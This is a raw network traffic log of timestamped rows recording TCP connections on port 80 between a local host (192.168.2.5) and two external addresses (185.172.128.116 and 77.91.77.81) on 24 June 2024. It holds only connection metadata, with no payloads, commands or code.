Jun 24, 2024 00:10:22.617729902 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.617734909 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.617844105 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.617856026 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.617866993 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.617878914 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.617887020 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.617887020 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.617892027 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.617903948 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.617933989 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.617964029 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.617964029 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.618036985 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.618048906 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.618060112 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.618072033 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.618083000 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.618093967 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.618115902 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.618156910 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.618165016 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.618330956 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.621310949 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.621336937 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.621349096 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.621455908 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.621467113 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.621478081 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.621490955 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.621494055 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.621530056 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.621552944 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.621552944 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.621845961 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.621906996 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.621917009 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.621937990 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.621954918 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.621968031 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.621978045 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.621989965 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.621990919 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.622024059 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.622055054 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.622055054 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.622144938 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.622158051 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.622168064 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.622215033 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.622225046 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.622236013 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.622236967 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.622242928 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.622251034 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.622283936 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.622333050 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.622343063 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.622353077 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.622370958 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.622395039 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.622406960 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.622411013 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.622452021 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.622490883 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.622503996 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.622514963 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.622515917 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.622528076 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.622545004 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.622649908 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.622661114 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.622669935 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.622673035 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.622710943 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.622721910 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.622735023 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.622750998 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.622761011 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.622772932 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.622777939 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.622785091 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.622785091 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.622951984 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.624813080 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.624876022 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.624886036 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.624890089 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.624928951 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.624941111 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.624949932 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.624949932 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.624999046 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.625010014 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.625022888 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.625034094 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.625046015 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.625052929 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.625077009 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.625196934 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.625207901 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.625225067 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.625235081 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.625236034 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.625247955 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.625250101 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.625261068 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.625273943 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.625276089 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.625287056 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.625298023 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.625303030 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.625315905 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.625354052 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.625354052 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.625444889 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.625457048 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.625468016 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.625478983 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.625489950 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.625500917 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.625514984 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.625514984 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.625519037 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.625530958 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.625541925 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.625557899 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.625575066 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.625611067 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.634977102 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.635014057 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.635024071 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.635045052 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.635092020 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.635109901 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.635143995 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.635154963 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.635174036 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.635212898 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.635226011 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.635246038 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.635320902 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.635324955 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.635333061 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.635344028 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.635358095 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.635369062 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.635374069 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.635396004 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.635410070 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.635432959 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.635443926 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.635454893 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.635484934 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.635561943 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.636858940 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.636907101 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.636917114 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.637001991 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.637011051 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.637027025 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.637036085 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.637037992 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.637065887 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.637427092 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.637492895 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.637537956 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.637546062 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.637551069 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.637594938 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.637594938 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.637600899 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.637614012 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.637628078 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.637684107 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.637684107 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.637695074 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.637794018 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.658518076 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.658565998 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.658577919 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.658592939 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.658651114 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.658652067 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.658662081 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.658674002 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.658684969 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.658688068 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.658709049 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.658709049 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.658788919 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.658824921 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.658834934 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.658847094 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.658857107 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.658868074 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.658879042 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.658889055 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.658889055 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.658912897 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.658926010 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.659132957 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.659143925 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.659153938 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.659164906 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.659176111 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.659185886 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.659188032 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.659197092 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.659208059 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.659220934 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.659275055 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.659285069 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.659296036 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.659300089 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.659307003 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.659315109 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.659368038 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.659368038 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.659379959 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.659392118 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.659403086 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.659413099 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.659425974 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.659615040 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.659840107 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.659851074 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.659862041 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.659885883 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.659885883 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.659898043 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.659907103 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.659909010 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.659920931 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.659936905 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.660007000 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.660648108 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.660720110 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.660728931 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.660748959 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.660773039 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.660784006 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.660794973 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.660797119 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.660805941 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.660830021 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.660857916 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.660881042 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.660883904 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.660893917 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.660958052 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.660970926 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.660978079 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.660981894 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.660994053 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.661046982 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.661067963 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.661078930 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.661089897 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.661202908 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.661211967 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.661221981 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.661228895 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.661233902 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.661252975 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.661286116 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.661298990 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.661309004 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.661313057 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.661325932 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.661334038 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.661350965 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.661379099 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.661964893 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.661976099 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.661987066 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.661998987 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662050962 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.662050962 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.662091017 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662102938 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662115097 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662134886 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.662173033 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662184000 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662192106 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.662199974 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662220955 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.662271023 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.662312984 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662322998 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662333012 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662343979 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662354946 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.662355900 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662365913 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662377119 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662386894 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.662400007 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.662451029 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662461996 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662473917 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662476063 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.662499905 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662501097 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.662512064 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662522078 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662533045 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.662554026 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.662659883 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.662674904 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662684917 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662695885 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662708044 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662719965 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.662719965 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.662774086 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.662904978 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662915945 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662926912 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662935972 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662945986 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662950993 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.662957907 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662967920 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662971020 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.662980080 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.662991047 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.663005114 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.663028955 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.663028955 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.663033009 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.663043976 CEST	80	49725	77.91.77.81	192.168.2.5
